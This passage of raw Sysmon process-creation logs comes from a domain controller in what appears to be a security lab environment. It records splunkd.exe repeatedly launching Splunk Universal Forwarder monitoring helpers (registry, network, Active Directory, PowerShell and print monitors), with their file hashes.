AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000036152Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:34:20.237{A8622C2F-4EEC-6078-EA06-00000000AE01}5204C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000036142Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:34:18.408{A8622C2F-4EEA-6078-E906-00000000AE01}4816C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 
154100x800000000000000036132Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:34:17.736{A8622C2F-4EE9-6078-E806-00000000AE01}6064C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000036122Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:34:17.081{A8622C2F-4EE9-6078-E706-00000000AE01}7140C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000036002Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:33:22.915{A8622C2F-4EB2-6078-E606-00000000AE01}6272C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT 
AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000035987Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:33:21.582{A8622C2F-4EB1-6078-E506-00000000AE01}7044C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000035977Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:33:20.900{A8622C2F-4EB0-6078-E406-00000000AE01}828C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000035968Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 
14:33:20.234{A8622C2F-4EB0-6078-E306-00000000AE01}6428C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000035948Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:33:18.404{A8622C2F-4EAE-6078-E206-00000000AE01}3172C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000035936Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:33:17.731{A8622C2F-4EAD-6078-E106-00000000AE01}5928C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT 
AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000035928Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:33:17.073{A8622C2F-4EAD-6078-E006-00000000AE01}2280C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000035792Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:32:22.906{A8622C2F-4E76-6078-DF06-00000000AE01}4264C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 
154100x800000000000000035780Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:32:21.558{A8622C2F-4E75-6078-DE06-00000000AE01}6464C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000035770Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:32:20.886{A8622C2F-4E74-6078-DD06-00000000AE01}6736C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000035761Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:32:20.216{A8622C2F-4E74-6078-DC06-00000000AE01}6256C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT 
AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000035750Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:32:18.395{A8622C2F-4E72-6078-DB06-00000000AE01}932C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000035740Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:32:17.731{A8622C2F-4E71-6078-DA06-00000000AE01}6484C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 
154100x800000000000000035730Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:32:17.056{A8622C2F-4E71-6078-D906-00000000AE01}4560C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000035648Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:31:22.888{A8622C2F-4E3A-6078-D806-00000000AE01}2424C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000035634Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:31:21.570{A8622C2F-4E39-6078-D706-00000000AE01}1056C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT 
AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000035624Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:31:20.888{A8622C2F-4E38-6078-D606-00000000AE01}7060C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000035615Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:31:20.211{A8622C2F-4E38-6078-D506-00000000AE01}4424C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000035604Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:31:18.409{A8622C2F-4E36-6078-D406-00000000AE01}7036C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000035593Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:31:17.744{A8622C2F-4E35-6078-D306-00000000AE01}4384C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000035585Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:31:17.068{A8622C2F-4E35-6078-D206-00000000AE01}4264C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT 
AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000035504Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:30:22.872{A8622C2F-4DFE-6078-D106-00000000AE01}4940C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000035459Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:30:21.678{A8622C2F-4DFD-6078-D006-00000000AE01}3008C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000035449Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 
14:30:21.003{A8622C2F-4DFD-6078-CF06-00000000AE01}3308C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000035439Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:30:20.331{A8622C2F-4DFC-6078-CE06-00000000AE01}7016C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000035430Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:30:18.405{A8622C2F-4DFA-6078-CD06-00000000AE01}928C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000035420Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:30:17.723{A8622C2F-4DF9-6078-CC06-00000000AE01}6556C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000035409Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:30:17.055{A8622C2F-4DF9-6078-CB06-00000000AE01}5320C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000035336Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:29:22.855{A8622C2F-4DC2-6078-CA06-00000000AE01}6568C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk 
